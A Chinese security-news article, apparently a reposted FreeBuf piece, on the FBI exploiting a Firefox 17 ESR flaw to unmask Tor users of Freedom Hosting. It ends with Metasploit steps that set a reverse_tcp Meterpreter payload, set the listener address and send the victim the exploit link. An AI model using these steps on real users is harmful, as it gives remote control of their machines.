CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

firefox tor

2017年5月23日 961点热度 0人点赞 0条评论

firefox tor

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

FBI追踪Tor用户使用的Firefox漏洞利用程序

litdg2013-12-10共95152人围观 ,发现 6 个不明物体WEB安全

    Tor网络是一种允许用户匿名访问网站和其他服务的网络。在这个网络中,存在一种称为黑暗网络(darknet)的服务,从论坛到电子邮件都有,这些服务是只有通过tor才可以访问。

Tor通过志愿者提供的3000多个中继传输网络流量从而隐藏真实用户的位置信息。尽管Tor网络上的很多服务都是清白的,但是它的匿名性也吸引了很多具有犯罪意图的人,比如传播儿童色情的组织。

出生于美国的Eric Eoin Marques居住在爱尔兰的都柏林,他是Freedom Hosting的首席架构师,而Freedom Hosting在欧洲的550台服务器被指控用来托管儿童色情网站。

Freedom Hosting就是Tor网络上的一个重要的服务提供商。它的服务只能通过tor网络来访问。因为它涉嫌违法的事情,所以Tor的负责人还特地发表过声明,称他们跟运营Freedom Hosting的人没有任何关系。声明如下:

“运营Freedom Hosting的人或组织跟开发Tor软件的团队没有任何关联和隶属关系。过去,曾有敌对的组织试图绕过tor隐藏的服务,直接攻击tor网络背后服务器上的软件。通常都是利用php,mysql和其他的软件的漏洞而不是tor本身的漏洞。最近有消息表明,有人成功利用了Freedom Hosting背后的软件漏洞。据我们所知是利用了Firefox 17 ESR的一个bug,tor浏览器就是基于这个firefox版本的。我们会研究这些bug,并尽快修复他们。

FBI利用了firefox17的一个漏洞,成功追踪到了Freedom Hosting的服务器。它使用的payload是收集电脑的MAC地址和hostname,然后通过http协议发送到自己控制的服务器上从而获得真实的ip地址。

Mozilla Firefox 小于22.0的版本,Firefox ESR 17.x,小于17.07的版本,Thunderbird ESR 17.x,小于17.07的版本没有妥善的处理onreadystatechange事件,导致远程攻击者可以拒绝服务攻击(程序crash)或者可能执行任意代码。

2013年8月份的时候就已经有人在利用这个漏洞攻击Tor browser的用户了。现在msf上已经有利用模块,针对firefox17.06.模块使用说明:

windows/browser/mozilla_firefox_onreadystatechange:

输入show options检查这个exp的配置项

SRVHOST是msf本机的地址,这里配置命令是set SRVHOST 192.168.0.3

然后设置payloadset PAYLOAD windows/meterpreter/reverse_tcp

输入show options查看payload的配置项

设置接受反弹shell的地址 set LHOST 192.168.0.103

输入run命令开始监听:

只要让受害者访问这个exp生成的链接就可以了.这里是http://192.168.0.103:8080/2Hek0bdO

如果对方的浏览器存在漏洞可以看到msf的输出如下:

参考资料:

http://rt.com/usa/fbi-exploiting-tor-child-porn-842/

http://siliconangle.com/blog/2013/08/06/darknet-freedom-hosting-sites-shutdown-led-by-fbi-exploit-use-against-tor-network/

http://thehackernews.com/2013/08/Firefox-Exploit-Tor-Network-child-pornography-Freedom-Hosting.html

http://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_firefox_onreadystatechange

via http://resources.infosecinstitute.com 翻译整理by litdg@freebuf

litdg

litdg37 篇文章等级: 6级
|
|
  • 上一篇:渗透测试实战案例:艺帆CMS漏洞分析和官网测试
  • 下一篇:使用Node.js抓取sebug漏洞目录

这些评论亮了

  • 河蟹回复
    图没有截完,后面肯定没有获得shell.
    )10(亮了
发表评论

已有 6 条评论

  • 河蟹 2013-12-10回复1楼

    图没有截完,后面肯定没有获得shell.

    亮了(10)
    • litdg (6级)FB作者 2013-12-10回复

      @和谐 ls牛逼啊,求分享。这个文章的图确实有问题。很多都是卡在这里。成功获取shell的截图应该是这样子的。https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-6267-3370/1572-900/Screen+Shot+2013-08-07+at+2.10.40+AM.png

      亮了(2)
  • litdg (6级)FB作者 2013-12-10回复2楼

    亮了(2)
    • litdg (6级)FB作者 2013-12-10回复

      @litdg  更细节的技术分析可以参考这里https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690 当时编辑的时候忘记加上去了。实在抱歉。 貌似评论无法编辑。

      亮了(2)
  • 和谐你大爷 2013-12-10回复3楼

    我怎么记得是fbi黑了tor服务器在出口服务器做个程序直接给你的浏览器注入js获取你的真实信息?

    亮了(2)
  • hang333 (4级) 2013-12-10回复4楼

    很久的新闻了

    亮了(1)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

litdg

litdg

FB作者

37 篇文章103 条评论

相关阅读

  • 还有王法吗?美国联邦调查局开发人脸识别系统,数据源涉及公民隐私
  • 加密困局:FBI要求科技公司停止提供通信加密服务
  • 20年来的管中一窥:FBI究竟是如何窃听你的计算机的?
  • FBI反抗法官命令:拒绝透露利用Tor浏览器漏洞的代码
  • Tor洋葱浏览器加固升级:FBI追踪难度将进一步变大

特别推荐

关注我们 分享每日精选文章

不容错过

  • 如何破解12位+字符的高强度密码?secist2017-01-18
  • Hash传递攻击Windows2012远程桌面litdg2013-10-31
  • VxWorks Fuzzing 之道:VxWorks 工控实时操作系统漏洞挖掘调试与利用揭秘知道创宇2016-01-15
  • 韩剧《幽灵》中的黑客工具都有哪些?raycel2016-01-19

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me